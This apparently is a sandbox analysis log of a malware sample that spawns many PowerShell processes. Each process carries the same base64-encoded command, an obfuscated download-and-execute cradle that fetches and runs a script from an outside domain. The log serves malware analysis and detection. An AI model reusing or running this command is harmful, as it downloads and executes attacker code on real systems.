	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1539
	os_tid = 0x2050

	[0791.010] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1751
	os_tid = 0xbbc


Thread:
	id = 1762
	os_tid = 0x1698


Thread:
	id = 2079
	os_tid = 0x2538


Thread:
	id = 2081
	os_tid = 0x2084


Thread:
	id = 2085
	os_tid = 0x1f3c


Thread:
	id = 2140
	os_tid = 0x211c


Process:
	id = "244"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2f10a000"
	os_pid = "0x20a4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1557
	os_tid = 0x20a8

	[0816.999] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1816
	os_tid = 0x2328


Thread:
	id = 1831
	os_tid = 0x2410


Process:
	id = "245"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x54016000"
	os_pid = "0x2120"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1597
	os_tid = 0x2124

	[0858.182] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1902
	os_tid = 0x2588


Thread:
	id = 1922
	os_tid = 0x25ec


Process:
	id = "246"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1da94000"
	os_pid = "0x21a0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "99"
	os_parent_pid = "0x12e0"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1618
	os_tid = 0x21a4

	[0783.235] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1829
	os_tid = 0x2408


Thread:
	id = 1836
	os_tid = 0x2428


Process:
	id = "247"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1135b000"
	os_pid = "0x21cc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "111"
	os_parent_pid = "0x114c"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1611
	os_tid = 0x21d0

	[0783.356] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1719
	os_tid = 0x20e0


Thread:
	id = 1729
	os_tid = 0x1f3c


Thread:
	id = 2082
	os_tid = 0x908


Thread:
	id = 2083
	os_tid = 0x1f70


Thread:
	id = 2086
	os_tid = 0x1fa4


Thread:
	id = 2141
	os_tid = 0x2464


Process:
	id = "248"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x79183000"
	os_pid = "0x21e8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1613
	os_tid = 0x21ec

	[0847.982] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1858
	os_tid = 0x249c


Thread:
	id = 1867
	os_tid = 0x24c0


Thread:
	id = 2114
	os_tid = 0x1e54


Thread:
	id = 2116
	os_tid = 0x1fac


Thread:
	id = 2120
	os_tid = 0x2340


Process:
	id = "249"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4dfed000"
	os_pid = "0x22a8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1658
	os_tid = 0x22ac

	[0860.106] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1928
	os_tid = 0x2604


Thread:
	id = 1959
	os_tid = 0x2684


Process:
	id = "250"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x27fa000"
	os_pid = "0x22dc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "123"
	os_parent_pid = "0x11e0"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1665
	os_tid = 0x22e0

	[0788.528] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1720
	os_tid = 0x1f60


Thread:
	id = 1724
	os_tid = 0x1f70


Thread:
	id = 2097
	os_tid = 0x1264


Thread:
	id = 2098
	os_tid = 0x2168


Thread:
	id = 2101
	os_tid = 0x1d9c


Process:
	id = "251"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5fa43000"
	os_pid = "0x22ec"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1667
	os_tid = 0x22f0

	[0856.479] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1903
	os_tid = 0x258c


Thread:
	id = 1923
	os_tid = 0x25f0


Process:
	id = "252"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5fc52000"
	os_pid = "0x231c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1675
	os_tid = 0x2320

	[0858.590] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1912
	os_tid = 0x25bc


Thread:
	id = 1932
	os_tid = 0x2614


Process:
	id = "253"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5a45f000"
	os_pid = "0x2338"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1677
	os_tid = 0x233c

	[0857.731] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1916
	os_tid = 0x25cc


Thread:
	id = 1944
	os_tid = 0x2648


Process:
	id = "254"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x46aeb000"
	os_pid = "0x2364"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1682
	os_tid = 0x2368

	[0857.153] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1915
	os_tid = 0x25c8


Thread:
	id = 1941
	os_tid = 0x2638


Process:
	id = "255"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3b677000"
	os_pid = "0x23a4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1692
	os_tid = 0x23a8

	[0859.412] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1924
	os_tid = 0x25f4


Thread:
	id = 1955
	os_tid = 0x2674


Process:
	id = "256"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x74d54000"
	os_pid = "0x15f4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1714
	os_tid = 0x1d6c

	[0860.942] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1929
	os_tid = 0x2608


Thread:
	id = 1965
	os_tid = 0x269c


Process:
	id = "257"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3539d000"
	os_pid = "0x1ef8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
